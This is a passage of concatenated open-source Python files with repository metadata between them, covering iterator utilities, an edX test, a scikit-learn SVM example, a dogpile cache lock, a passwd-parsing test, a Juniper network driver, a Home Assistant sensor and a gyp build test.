def flatten_all(list_of_list): """Flatten arbitrary depth of nesting. Good for unknown nesting structure iterable object. Usage:: >>> flatten_all([[0, 1], [2, 3, [4, 5], [6, 7, 8]], [9,]]) [0, 1, 2, 3, 4, 5, 6, 7, 8, 9] """ for i in list_of_list: if hasattr(i, "__iter__"): for j in flatten_all(i): yield j else: yield i def nth(iterable, n, default=None): """Returns the nth item or a default value. Usage:: >>> nth([0, 1, 2], 1) 1 >>> nth([0, 1, 2], 100) None """ return next(itertools.islice(iterable, n, None), default) def shuffled(iterable): """Returns the shuffled iterable. Usage:: >>> shuffled([0, 1, 2] [2, 0, 1] """ return random.sample(iterable, len(iterable)) def grouper(iterable, n, fillvalue=None): """Collect data into fixed-length chunks or blocks. Usage:: >>> list(grouper(range(10), n=3, fillvalue=1024)) [(0, 1, 2), (3, 4, 5), (6, 7, 8), (9, 1024, 1024)] """ # grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx args = [iter(iterable)] * n return zip_longest(fillvalue=fillvalue, *args) def grouper_list(l, n): """Evenly divide list into fixed-length piece, no filled value if chunk size smaller than fixed-length. Usage:: >>> list(grouper(range(10), n=3) [[0, 1, 2], [3, 4, 5], [6, 7, 8], [9]] **中文文档** 目前为止, 一共有3种实现方法。其中第三种方法对于不同的N, 效率都是最高。 1最差, 2其次。 - 方法1: 调用grouper()函数, 然后对里面的None元素进行清理。 - 方法2: 建立一个list, 每次添加一个元素, 并检查len()。 - 方法3: 建立一个counter, 随着每个group的元素数量增加, 并与size比较。 """ chunk = list() counter = 0 for item in l: counter += 1 chunk.append(item) if counter == n: yield chunk chunk = list() counter = 0 if len(chunk) > 0: yield chunk def grouper_dict(d, n): """Evenly divide dictionary into fixed-length piece, no filled value if chunk size smaller than fixed-length. Usage:: >>> list(grouper_dict({1: 'A', 2: 'B', 3: 'C', 4: 'D', 5: 'E', 6: 'F', 7: 'G', 8: 'H', 9: 'I', 10: 'J'})) [{1: 'A', 2: 'B', 3: 'C'}, {4: 'D', 5: 'E', 6: 'F'}, {7: 'G', 8: 'H', 9: 'I'}, {10: 'J'}] """ chunk = dict() counter = 0 for k, v in d.items(): counter += 1 chunk[k] = v print(counter ,chunk) if counter == n: yield chunk chunk = dict() counter = 0 if len(chunk) > 0: yield chunk def running_windows(iterable, size): """Generate n-size running windows. Usage:: >>> for i in running_windows([1, 2, 3, 4, 5], size=3): ... print(i) [1, 2, 3] [2, 3, 4] [3, 4, 5] """ fifo = collections.deque(maxlen=size) for i in iterable: fifo.append(i) if len(fifo) == size: yield list(fifo) def cycle_running_windows(iterable, size): """Generate n-size cycle running windows. Usage:: >>> for i in running_windows([1, 2, 3, 4, 5], size=3): ... print(i) [1, 2, 3] [2, 3, 4] [3, 4, 5] [4, 5, 1] [5, 1, 2] """ fifo = collections.deque(maxlen=size) cycle = itertools.cycle(iterable) counter = itertools.count(1) length = len(iterable) for i in cycle: fifo.append(i) if len(fifo) == size: yield list(fifo) if next(counter) == length: break def cycle_slice(sliceable, start, end): """Given a list, return right hand cycle direction slice from start to end. Usage:: >>> array = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9] >>> cycle_slice(array, 4, 7) # from array[4] to array[7] [4, 5, 6, 7] >>> cycle_slice(array, 8, 2) # from array[8] to array[2] [8, 9, 0, 1, 2] """ if type(sliceable) != list: sliceable = list(sliceable) if end >= start: return sliceable[start:end+1] else: return sliceable[start:] + sliceable[:end+1] def cycle_dist(x, y, n): """Find Distance between x, y by means of a n-length cycle. Example: cycle_dist(1, 23, 24) = 2 cycle_dist(5, 13, 24) = 8 cycle_dist(0.0, 2.4, 1.0) = 0.4 cycle_dist(0.0, 2.6, 1.0) = 0.4 """ dist = abs(x - y) % n if dist >= 0.5 * n: dist = n - dist return dist def shift_to_the_left(array, dist, pad=True, trim=True): """Shift array to the left. :param array: An iterable object. :type array: iterable object :param dist: how far you want to shift :type disk: int :param pad: pad array[-1] to the right. :type pad: boolean (default True) :param trim: trim the first ``#dist`` items. :type trim: boolean (default True) Usage:: >>> array = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9] >>> shift_to_the_left(self.iterable_list, 1, pad=True, trim=True) [1, 2, 3, 4, 5, 6, 7, 8, 9, 9] >>> shift_to_the_left(self.iterable_list, 1, pad=True, trim=False) [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 9] >>> shift_to_the_left(self.iterable_list, 1, pad=False, trim=True) [1, 2, 3, 4, 5, 6, 7, 8, 9] >>> shift_to_the_left(self.iterable_list, 1, pad=True, trim=True) Warning, with pad=False and trim=False, no change applied. [0, 1, 2, 3, 4, 5, 6, 7, 8, 9] """ if dist < 0: raise ValueError("Shift distance has to greater or equal than 0.") if pad: if trim: new_array = array[dist:] + [array[-1]] * dist else: new_array = array + [array[-1]] * dist else: if trim: new_array = array[dist:] else: print("Warning, with pad=False and trim=False, no change applied.") new_array = list(array) return new_array def shift_to_the_right(array, dist, pad=True, trim=True): """Shift array to the right. :param array: An iterable object. :type array: iterable object :param dist: how far you want to shift :type disk: int :param pad: pad array[0] to the left. :type pad: boolean (default True) :param trim: trim the last ``#dist`` items. :type trim: boolean (default True) Usage:: >>> array = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9] >>> shift_to_the_right(self.iterable_list, 1, pad=True, trim=True) [0, 0, 1, 2, 3, 4, 5, 6, 7, 8] >>> shift_to_the_right(self.iterable_list, 1, pad=True, trim=False) [0, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9] >>> shift_to_the_right(self.iterable_list, 1, pad=False, trim=True) [0, 1, 2, 3, 4, 5, 6, 7, 8] >>> shift_to_the_right(self.iterable_list, 1, pad=True, trim=True) Warning, with pad=False and trim=False, no change applied. [0, 1, 2, 3, 4, 5, 6, 7, 8, 9] """ if dist < 0: raise ValueError("Shift distance has to greater or equal than 0.") if pad: if trim: new_array = [array[0]] * dist + array[:-dist] else: new_array = [array[0]] * dist + array else: if trim: new_array = array[:-dist] else: print("Warning, with pad=False and trim=False, no change applied.") new_array = list(array) return new_array def count_generator(generator, memory_efficient=True): """Count number of item in generator. memory_efficient=True, 3 times slower, but memory_efficient. memory_efficient=False, faster, but cost more memory. """ if memory_efficient: counter = 0 for _ in generator: counter += 1 return counter else: return len(list(generator)) if __name__ == "__main__": from angora.gadget.pytimer import Timer import time import unittest timer = Timer() class IterToolsUnittest(unittest.TestCase): def setUp(self): """ self.iterable_list = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9] self.iterable_set = {0, 1, 2, 3, 4, 5, 6, 7, 8, 9} self.iterable_dict = {1: 'A', 2: 'B', 3: 'C', 4: 'D', 5: 'E', 6: 'F', 7: 'G', 8: 'H', 9: 'I', 10: 'J',} """ self.iterable_generator = range(10) self.iterable_list = list(range(10)) self.iterable_set = set(list(range(10))) self.iterable_dict = {i: chr(j) for i, j in zip(range(1, 11), range(65, 75))} def test_take(self): self.assertEqual(take(5, self.iterable_generator), [0, 1, 2, 3, 4]) self.assertEqual(take(5, self.iterable_list), [0, 1, 2, 3, 4]) self.assertEqual(take(5, self.iterable_set), [0, 1, 2, 3, 4]) self.assertEqual(take(5, self.iterable_dict), [1, 2, 3, 4, 5]) def test_flatten_functionality(self): iterable = [[0, 1], [2, 3]] self.assertListEqual(list(flatten(iterable)), list(range(4))) def test_flatten_performance(self): complexity = 1000 iterable = [list(range(complexity))] * complexity st = time.clock() for _ in flatten(iterable): pass elapse_flatten = time.clock()- st st = time.clock() for chunk in iterable: for _ in chunk: pass elapse_double_loop = time.clock()- st self.assertGreater(elapse_flatten, elapse_double_loop) def test_flatten_all_functionality(self): iterable = [[0, 1], [2, 3, [4, 5], [6, 7, 8]], [9,]] self.assertListEqual(list(flatten_all(iterable)), list(range(10))) def test_nth(self): self.assertEqual(nth(self.iterable_list, 5), 5) self.assertEqual(nth(self.iterable_list, 100), None) def test_shuffled(self): self.assertNotEqual(shuffled(self.iterable_list), self.iterable_list) def test_grouper(self): self.assertEqual( list(grouper(self.iterable_list, 3, 1024)), [(0, 1, 2), (3, 4, 5), (6, 7, 8), (9, 1024, 1024)], ) def test_grouper_list(self): self.assertEqual( list(grouper_list(self.iterable_list, 3)), [[0, 1, 2], [3, 4, 5], [6, 7, 8], [9]], ) def test_grouper_dict(self): self.assertEqual( list(grouper_dict(self.iterable_dict, 3)), [ {1: 'A', 2: 'B', 3: 'C'}, {4: 'D', 5: 'E', 6: 'F'}, {7: 'G', 8: 'H', 9: 'I'}, {10: 'J'} ], ) def test_running_windows(self): self.assertEqual( list(running_windows([1,2,3,4,5], 3)), [[1, 2, 3], [2, 3, 4], [3, 4, 5]], ) def test_cycle_running_windows(self): self.assertEqual( list(cycle_running_windows([1,2,3,4,5], 3)), [[1, 2, 3], [2, 3, 4], [3, 4, 5], [4, 5, 1], [5, 1, 2]], ) def test_cycle_slice(self): self.assertEqual( list(cycle_slice(self.iterable_list, 4, 7)), [4,5,6,7], ) self.assertEqual( list(cycle_slice(self.iterable_list, 8, 2)), [8,9,0,1,2], ) def test_cycle_dist(self): self.assertEqual(cycle_dist(5, 13, 24), 8) self.assertEqual(cycle_dist(1, 23, 24), 2) self.assertAlmostEqual(cycle_dist(0.0, 2.4, 1.0), 0.4, delta=0.0001) self.assertAlmostEqual(cycle_dist(0.0, 2.6, 1.0), 0.4, delta=0.0001) def test_padding_left_shift(self): self.assertEqual( shift_to_the_left(self.iterable_list, 1, pad=True, trim=True), [1, 2, 3, 4, 5, 6, 7, 8, 9, 9], ) self.assertEqual( shift_to_the_left(self.iterable_list, 1, pad=True, trim=False), [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 9], ) self.assertEqual( shift_to_the_left(self.iterable_list, 1, pad=False, trim=True), [1, 2, 3, 4, 5, 6, 7, 8, 9], ) def test_shift_to_the_left(self): self.assertEqual( shift_to_the_left(self.iterable_list, 1, pad=True, trim=True), [1, 2, 3, 4, 5, 6, 7, 8, 9, 9], ) self.assertEqual( shift_to_the_left(self.iterable_list, 1, pad=True, trim=False), [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 9], ) self.assertEqual( shift_to_the_left(self.iterable_list, 1, pad=False, trim=True), [1, 2, 3, 4, 5, 6, 7, 8, 9], ) def test_shift_to_the_right(self): self.assertEqual( shift_to_the_right(self.iterable_list, 1, pad=True, trim=True), [0, 0, 1, 2, 3, 4, 5, 6, 7, 8], ) self.assertEqual( shift_to_the_right(self.iterable_list, 1, pad=True, trim=False), [0, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9], ) self.assertEqual( shift_to_the_right(self.iterable_list, 1, pad=False, trim=True), [0, 1, 2, 3, 4, 5, 6, 7, 8], ) def test_count_generator(self): self.assertEqual(count_generator(self.iterable_generator), 10) unittest.main() def test_flatten_performance(): """测试flatten的性能 flatten()本应该要比二重循环性能好, 但是似乎没能达到。 """ print("{:=^40}".format("test flatten()")) complexity = 1000 iterable = [list(range(complexity))] * complexity st = time.clock() for _ in flatten(iterable): pass print("fatten() method takes %.6f second" % (time.clock() - st)) st = time.clock() for chunk in iterable: for _ in chunk: pass print("double for loop method takes %.6f second" % (time.clock() - st)) # test_flatten_performance() def test_flatten_all_performance(): """测试flatten_all的性能。 flatten_all()虽然更方便一些, 但是性能上是不如根据已知的结构, 用多重 for loop循环来的好。 """ print("{:=^40}".format("test flatten_all()")) complexity = 100 a = [[[1] * complexity] * complexity] * complexity st = time.clock() for _ in flatten_all(a): pass print("fatten_all() method takes %.6f second" % (time.clock() - st)) st = time.clock() for l1 in a: for l2 in l1: for _ in l2: pass print("nested for loop method takes %.6f second" % (time.clock() - st)) # test_flatten_all_performance() def test_nth_performance(): """测试nth的性能。 对于只定义了__iter__而没有定义__getitem__方法的对象, nth()是比较合适的 做法。当然速度完全比不上list自带的索引方法list[i]。 """ print("{:=^40}".format("test nth()")) n = 10000 array = [i for i in range(n)] st = time.clock() for i in range(n): _ = array[i] print("iterable[i] method %.6f second" % (time.clock() - st)) st = time.clock() for i in range(n): _ = nth(array, i) print("nth(iterable, i) method %.6f second" % (time.clock() - st)) st = time.clock() for i in array: _ = i print("build-in for loop method %.6f second" % (time.clock() - st)) # test_nth_performance() def test_count_generator_performance(): """测试count_generator()的性能。 """ def number_generator(): for i in range(1000 * 1000): yield i print("{:=^40}".format("test count_generator()")) timer.start() count_generator(number_generator(), memory_efficient=True) print("memory_efficient way takes %s second" % timer.stop()) timer.start() count_generator(number_generator(), memory_efficient=False) print("non-memory_efficient way takes %s second" % timer.stop()) # test_count_generator_performance()
mit
Edraak/edraak-platform
lms/djangoapps/courseware/tests/test_course_tools.py
13
4261
""" Unit tests for course tools. """ import crum import datetime from mock import patch from nose.plugins.attrib import attr import pytz from django.test import RequestFactory from course_modes.models import CourseMode from course_modes.tests.factories import CourseModeFactory from courseware.course_tools import VerifiedUpgradeTool from courseware.models import DynamicUpgradeDeadlineConfiguration from openedx.core.djangoapps.content.course_overviews.models import CourseOverview from openedx.core.djangoapps.schedules.config import CREATE_SCHEDULE_WAFFLE_FLAG from openedx.core.djangoapps.site_configuration.tests.factories import SiteFactory from openedx.core.djangoapps.waffle_utils.testutils import override_waffle_flag from student.tests.factories import CourseEnrollmentFactory, UserFactory from xmodule.modulestore.tests.django_utils import SharedModuleStoreTestCase from xmodule.modulestore.tests.factories import CourseFactory @attr(shard=3) class VerifiedUpgradeToolTest(SharedModuleStoreTestCase): @classmethod def setUpClass(cls): super(VerifiedUpgradeToolTest, cls).setUpClass() cls.now = datetime.datetime.now(pytz.UTC) cls.course = CourseFactory.create( org='edX', number='test', display_name='Test Course', self_paced=True, start=cls.now - datetime.timedelta(days=30), ) cls.course_overview = CourseOverview.get_from_id(cls.course.id) @override_waffle_flag(CREATE_SCHEDULE_WAFFLE_FLAG, True) def setUp(self): super(VerifiedUpgradeToolTest, self).setUp() self.course_verified_mode = CourseModeFactory( course_id=self.course.id, mode_slug=CourseMode.VERIFIED, expiration_datetime=self.now + datetime.timedelta(days=30), ) patcher = patch('openedx.core.djangoapps.schedules.signals.get_current_site') mock_get_current_site = patcher.start() self.addCleanup(patcher.stop) mock_get_current_site.return_value = SiteFactory.create() DynamicUpgradeDeadlineConfiguration.objects.create(enabled=True) self.enrollment = CourseEnrollmentFactory( course_id=self.course.id, mode=CourseMode.AUDIT, course=self.course_overview, ) self.request = RequestFactory().request() self.request.user = self.enrollment.user crum.set_current_request(self.request) def test_tool_visible(self): self.assertTrue(VerifiedUpgradeTool().is_enabled(self.request, self.course.id)) def test_not_visible_when_no_enrollment_exists(self): self.enrollment.delete() request = RequestFactory().request() request.user = UserFactory() self.assertFalse(VerifiedUpgradeTool().is_enabled(self.request, self.course.id)) def test_not_visible_when_using_deadline_from_course_mode(self): DynamicUpgradeDeadlineConfiguration.objects.create(enabled=False) self.assertFalse(VerifiedUpgradeTool().is_enabled(self.request, self.course.id)) def test_not_visible_when_enrollment_is_inactive(self): self.enrollment.is_active = False self.enrollment.save() self.assertFalse(VerifiedUpgradeTool().is_enabled(self.request, self.course.id)) def test_not_visible_when_already_verified(self): self.enrollment.mode = CourseMode.VERIFIED self.enrollment.save() self.assertFalse(VerifiedUpgradeTool().is_enabled(self.request, self.course.id)) def test_not_visible_when_no_verified_track(self): self.course_verified_mode.delete() self.assertFalse(VerifiedUpgradeTool().is_enabled(self.request, self.course.id)) def test_not_visible_when_course_deadline_has_passed(self): self.course_verified_mode.expiration_datetime = self.now - datetime.timedelta(days=1) self.course_verified_mode.save() self.assertFalse(VerifiedUpgradeTool().is_enabled(self.request, self.course.id)) def test_not_visible_when_course_mode_has_no_deadline(self): self.course_verified_mode.expiration_datetime = None self.course_verified_mode.save() self.assertFalse(VerifiedUpgradeTool().is_enabled(self.request, self.course.id))
agpl-3.0
lin-credible/scikit-learn
examples/svm/plot_svm_scale_c.py
223
5375
""" ============================================== Scaling the regularization parameter for SVCs ============================================== The following example illustrates the effect of scaling the regularization parameter when using :ref:`svm` for :ref:`classification <svm_classification>`. For SVC classification, we are interested in a risk minimization for the equation: .. math:: C \sum_{i=1, n} \mathcal{L} (f(x_i), y_i) + \Omega (w) where - :math:`C` is used to set the amount of regularization - :math:`\mathcal{L}` is a `loss` function of our samples and our model parameters. - :math:`\Omega` is a `penalty` function of our model parameters If we consider the loss function to be the individual error per sample, then the data-fit term, or the sum of the error for each sample, will increase as we add more samples. The penalization term, however, will not increase. When using, for example, :ref:`cross validation <cross_validation>`, to set the amount of regularization with `C`, there will be a different amount of samples between the main problem and the smaller problems within the folds of the cross validation. Since our loss function is dependent on the amount of samples, the latter will influence the selected value of `C`. The question that arises is `How do we optimally adjust C to account for the different amount of training samples?` The figures below are used to illustrate the effect of scaling our `C` to compensate for the change in the number of samples, in the case of using an `l1` penalty, as well as the `l2` penalty. l1-penalty case ----------------- In the `l1` case, theory says that prediction consistency (i.e. that under given hypothesis, the estimator learned predicts as well as a model knowing the true distribution) is not possible because of the bias of the `l1`. It does say, however, that model consistency, in terms of finding the right set of non-zero parameters as well as their signs, can be achieved by scaling `C1`. l2-penalty case ----------------- The theory says that in order to achieve prediction consistency, the penalty parameter should be kept constant as the number of samples grow. Simulations ------------ The two figures below plot the values of `C` on the `x-axis` and the corresponding cross-validation scores on the `y-axis`, for several different fractions of a generated data-set. In the `l1` penalty case, the cross-validation-error correlates best with the test-error, when scaling our `C` with the number of samples, `n`, which can be seen in the first figure. For the `l2` penalty case, the best result comes from the case where `C` is not scaled. .. topic:: Note: Two separate datasets are used for the two different plots. The reason behind this is the `l1` case works better on sparse data, while `l2` is better suited to the non-sparse case. """ print(__doc__) # Author: Andreas Mueller <amueller@ais.uni-bonn.de> # Jaques Grobler <jaques.grobler@inria.fr> # License: BSD 3 clause import numpy as np import matplotlib.pyplot as plt from sklearn.svm import LinearSVC from sklearn.cross_validation import ShuffleSplit from sklearn.grid_search import GridSearchCV from sklearn.utils import check_random_state from sklearn import datasets rnd = check_random_state(1) # set up dataset n_samples = 100 n_features = 300 # l1 data (only 5 informative features) X_1, y_1 = datasets.make_classification(n_samples=n_samples, n_features=n_features, n_informative=5, random_state=1) # l2 data: non sparse, but less features y_2 = np.sign(.5 - rnd.rand(n_samples)) X_2 = rnd.randn(n_samples, n_features / 5) + y_2[:, np.newaxis] X_2 += 5 * rnd.randn(n_samples, n_features / 5) clf_sets = [(LinearSVC(penalty='l1', loss='squared_hinge', dual=False, tol=1e-3), np.logspace(-2.3, -1.3, 10), X_1, y_1), (LinearSVC(penalty='l2', loss='squared_hinge', dual=True, tol=1e-4), np.logspace(-4.5, -2, 10), X_2, y_2)] colors = ['b', 'g', 'r', 'c'] for fignum, (clf, cs, X, y) in enumerate(clf_sets): # set up the plot for each regressor plt.figure(fignum, figsize=(9, 10)) for k, train_size in enumerate(np.linspace(0.3, 0.7, 3)[::-1]): param_grid = dict(C=cs) # To get nice curve, we need a large number of iterations to # reduce the variance grid = GridSearchCV(clf, refit=False, param_grid=param_grid, cv=ShuffleSplit(n=n_samples, train_size=train_size, n_iter=250, random_state=1)) grid.fit(X, y) scores = [x[1] for x in grid.grid_scores_] scales = [(1, 'No scaling'), ((n_samples * train_size), '1/n_samples'), ] for subplotnum, (scaler, name) in enumerate(scales): plt.subplot(2, 1, subplotnum + 1) plt.xlabel('C') plt.ylabel('CV Score') grid_cs = cs * float(scaler) # scale the C's plt.semilogx(grid_cs, scores, label="fraction %.2f" % train_size) plt.title('scaling=%s, penalty=%s, loss=%s' % (name, clf.penalty, clf.loss)) plt.legend(loc="best") plt.show()
bsd-3-clause
dannyboi104/SickRage
lib/dogpile/core/dogpile.py
59
5640
import time import logging log = logging.getLogger(__name__) class NeedRegenerationException(Exception): """An exception that when raised in the 'with' block, forces the 'has_value' flag to False and incurs a regeneration of the value. """ NOT_REGENERATED = object() class Lock(object): """Dogpile lock class. Provides an interface around an arbitrary mutex that allows one thread/process to be elected as the creator of a new value, while other threads/processes continue to return the previous version of that value. .. versionadded:: 0.4.0 The :class:`.Lock` class was added as a single-use object representing the dogpile API without dependence on any shared state between multiple instances. :param mutex: A mutex object that provides ``acquire()`` and ``release()`` methods. :param creator: Callable which returns a tuple of the form (new_value, creation_time). "new_value" should be a newly generated value representing completed state. "creation_time" should be a floating point time value which is relative to Python's ``time.time()`` call, representing the time at which the value was created. This time value should be associated with the created value. :param value_and_created_fn: Callable which returns a tuple of the form (existing_value, creation_time). This basically should return what the last local call to the ``creator()`` callable has returned, i.e. the value and the creation time, which would be assumed here to be from a cache. If the value is not available, the :class:`.NeedRegenerationException` exception should be thrown. :param expiretime: Expiration time in seconds. Set to ``None`` for never expires. This timestamp is compared to the creation_time result and ``time.time()`` to determine if the value returned by value_and_created_fn is "expired". :param async_creator: A callable. If specified, this callable will be passed the mutex as an argument and is responsible for releasing the mutex after it finishes some asynchronous value creation. The intent is for this to be used to defer invocation of the creator callable until some later time. .. versionadded:: 0.4.1 added the async_creator argument. """ def __init__(self, mutex, creator, value_and_created_fn, expiretime, async_creator=None, ): self.mutex = mutex self.creator = creator self.value_and_created_fn = value_and_created_fn self.expiretime = expiretime self.async_creator = async_creator def _is_expired(self, createdtime): """Return true if the expiration time is reached, or no value is available.""" return not self._has_value(createdtime) or \ ( self.expiretime is not None and time.time() - createdtime > self.expiretime ) def _has_value(self, createdtime): """Return true if the creation function has proceeded at least once.""" return createdtime > 0 def _enter(self): value_fn = self.value_and_created_fn try: value = value_fn() value, createdtime = value except NeedRegenerationException: log.debug("NeedRegenerationException") value = NOT_REGENERATED createdtime = -1 generated = self._enter_create(createdtime) if generated is not NOT_REGENERATED: generated, createdtime = generated return generated elif value is NOT_REGENERATED: try: value, createdtime = value_fn() return value except NeedRegenerationException: raise Exception("Generation function should " "have just been called by a concurrent " "thread.") else: return value def _enter_create(self, createdtime): if not self._is_expired(createdtime): return NOT_REGENERATED async = False if self._has_value(createdtime): if not self.mutex.acquire(False): log.debug("creation function in progress " "elsewhere, returning") return NOT_REGENERATED else: log.debug("no value, waiting for create lock") self.mutex.acquire() try: log.debug("value creation lock %r acquired" % self.mutex) # see if someone created the value already try: value, createdtime = self.value_and_created_fn() except NeedRegenerationException: pass else: if not self._is_expired(createdtime): log.debug("value already present") return value, createdtime elif self.async_creator: log.debug("Passing creation lock to async runner") self.async_creator(self.mutex) async = True return value, createdtime log.debug("Calling creation function") created = self.creator() return created finally: if not async: self.mutex.release() log.debug("Released creation lock") def __enter__(self): return self._enter() def __exit__(self, type, value, traceback): pass
gpl-3.0
michalfita/nis2ldap
tests/test_records_person.py
1
1591
# This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. import unittest import records.person class TestRecordPerson(unittest.TestCase): def setUp(self): pass def test_typical_passwd_entry(self): instance = records.person.produce("bunny:8XvAVu/sWGcZQ:1344:504:Bugs Bunny,,,:/home/bbugs:/bin/bash") self.assertEqual(instance.username, "bunny") self.assertEqual(instance.uid, 1344) self.assertEqual(instance.gid, 504) self.assertEqual(instance.firstname, "Bugs") self.assertEqual(instance.lastname, "Bunny") with self.assertRaises(AttributeError): instance.email self.assertEqual(instance.password, "8XvAVu/sWGcZQ") self.assertEqual(instance.home, "/home/bbugs") self.assertEqual(instance.shell, "/bin/bash") self.assertEqual(instance.gecos, "Bugs Bunny,,,") self.assertEqual(instance.phone, "") self.assertEqual(instance.room, "") self.assertEqual(instance.other, "")
gpl-3.0
ninnux/exscript
src/Exscript/protocols/drivers/junos_erx.py
7
1624
# Copyright (C) 2007-2010 Samuel Abels. # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License version 2, as # published by the Free Software Foundation. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA """ A driver for devices running Juniper ERX OS. """ import re from Exscript.protocols.drivers.driver import Driver from Exscript.protocols.drivers.ios import _prompt_re _user_re = [re.compile(r'[\r\n]User: $')] _password_re = [re.compile(r'[\r\n](Telnet password:|Password:) $')] _junos_re = re.compile(r'\bJuniper Networks\b', re.I) class JunOSERXDriver(Driver): def __init__(self): Driver.__init__(self, 'junos_erx') self.user_re = _user_re self.password_re = _password_re self.prompt_re = _prompt_re def check_head_for_os(self, string): if _junos_re.search(string): return 75 return 0 def init_terminal(self, conn): conn.execute('terminal length 60') conn.execute('terminal width 150') def auto_authorize(self, conn, account, flush, bailout): conn.send('enable 15\r') conn.app_authorize(account, flush, bailout)
gpl-2.0
PetePriority/home-assistant
homeassistant/components/waterfurnace/sensor.py
4
3993
""" Support for Waterfurnace. For more details about this platform, please refer to the documentation at https://home-assistant.io/components/sensor.waterfurnace/ """ from homeassistant.components.sensor import ENTITY_ID_FORMAT from homeassistant.components.waterfurnace import ( DOMAIN as WF_DOMAIN, UPDATE_TOPIC ) from homeassistant.const import TEMP_FAHRENHEIT from homeassistant.core import callback from homeassistant.helpers.entity import Entity from homeassistant.util import slugify class WFSensorConfig: """Water Furnace Sensor configuration.""" def __init__(self, friendly_name, field, icon="mdi:gauge", unit_of_measurement=None): """Initialize configuration.""" self.friendly_name = friendly_name self.field = field self.icon = icon self.unit_of_measurement = unit_of_measurement SENSORS = [ WFSensorConfig("Furnace Mode", "mode"), WFSensorConfig("Total Power", "totalunitpower", "mdi:flash", "W"), WFSensorConfig("Active Setpoint", "tstatactivesetpoint", "mdi:thermometer", TEMP_FAHRENHEIT), WFSensorConfig("Leaving Air", "leavingairtemp", "mdi:thermometer", TEMP_FAHRENHEIT), WFSensorConfig("Room Temp", "tstatroomtemp", "mdi:thermometer", TEMP_FAHRENHEIT), WFSensorConfig("Loop Temp", "enteringwatertemp", "mdi:thermometer", TEMP_FAHRENHEIT), WFSensorConfig("Humidity Set Point", "tstathumidsetpoint", "mdi:water-percent", "%"), WFSensorConfig("Humidity", "tstatrelativehumidity", "mdi:water-percent", "%"), WFSensorConfig("Compressor Power", "compressorpower", "mdi:flash", "W"), WFSensorConfig("Fan Power", "fanpower", "mdi:flash", "W"), WFSensorConfig("Aux Power", "auxpower", "mdi:flash", "W"), WFSensorConfig("Loop Pump Power", "looppumppower", "mdi:flash", "W"), WFSensorConfig("Compressor Speed", "actualcompressorspeed", "mdi:speedometer"), WFSensorConfig("Fan Speed", "airflowcurrentspeed", "mdi:fan"), ] def setup_platform(hass, config, add_entities, discovery_info=None): """Set up the Waterfurnace sensor.""" if discovery_info is None: return sensors = [] client = hass.data[WF_DOMAIN] for sconfig in SENSORS: sensors.append(WaterFurnaceSensor(client, sconfig)) add_entities(sensors) class WaterFurnaceSensor(Entity): """Implementing the Waterfurnace sensor.""" def __init__(self, client, config): """Initialize the sensor.""" self.client = client self._name = config.friendly_name self._attr = config.field self._state = None self._icon = config.icon self._unit_of_measurement = config.unit_of_measurement # This ensures that the sensors are isolated per waterfurnace unit self.entity_id = ENTITY_ID_FORMAT.format( 'wf_{}_{}'.format(slugify(self.client.unit), slugify(self._attr))) @property def name(self): """Return the name of the sensor.""" return self._name @property def state(self): """Return the state of the sensor.""" return self._state @property def icon(self): """Return icon.""" return self._icon @property def unit_of_measurement(self): """Return the units of measurement.""" return self._unit_of_measurement @property def should_poll(self): """Return the polling state.""" return False async def async_added_to_hass(self): """Register callbacks.""" self.hass.helpers.dispatcher.async_dispatcher_connect( UPDATE_TOPIC, self.async_update_callback) @callback def async_update_callback(self): """Update state.""" if self.client.data is not None: self._state = getattr(self.client.data, self._attr, None) self.async_schedule_update_ha_state()
apache-2.0
t3wz/mtasa-blue
vendor/google-breakpad/src/tools/gyp/test/rules-rebuild/gyptest-default.py
345
2242
#!/usr/bin/env python # Copyright (c) 2012 Google Inc. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """ Verifies that a rule that generates multiple outputs rebuilds correctly when the inputs change. """ import TestGyp test = TestGyp.TestGyp(workdir='workarea_default') test.run_gyp('same_target.gyp', chdir='src') test.relocate('src', 'relocate/src') test.build('same_target.gyp', chdir='relocate/src') expect = """\ Hello from main.c Hello from prog1.in! Hello from prog2.in! """ test.run_built_executable('program', chdir='relocate/src', stdout=expect) test.up_to_date('same_target.gyp', 'program', chdir='relocate/src') test.sleep() contents = test.read(['relocate', 'src', 'prog1.in']) contents = contents.replace('!', ' AGAIN!') test.write(['relocate', 'src', 'prog1.in'], contents) test.build('same_target.gyp', chdir='relocate/src') expect = """\ Hello from main.c Hello from prog1.in AGAIN! Hello from prog2.in! """ test.run_built_executable('program', chdir='relocate/src', stdout=expect) test.up_to_date('same_target.gyp', 'program', chdir='relocate/src') test.sleep() contents = test.read(['relocate', 'src', 'prog2.in']) contents = contents.replace('!', ' AGAIN!') test.write(['relocate', 'src', 'prog2.in'], contents) test.build('same_target.gyp', chdir='relocate/src') expect = """\ Hello from main.c Hello from prog1.in AGAIN! Hello from prog2.in AGAIN! """ test.run_built_executable('program', chdir='relocate/src', stdout=expect) test.up_to_date('same_target.gyp', 'program', chdir='relocate/src') # Test that modifying a rule's inputs (specifically, make-sources.py) causes # the targets to be built. test.sleep() contents = test.read(['relocate', 'src', 'make-sources.py']) contents = contents.replace('%s', 'the amazing %s') test.write(['relocate', 'src', 'make-sources.py'], contents) test.build('same_target.gyp', chdir='relocate/src') expect = """\ Hello from main.c Hello from the amazing prog1.in 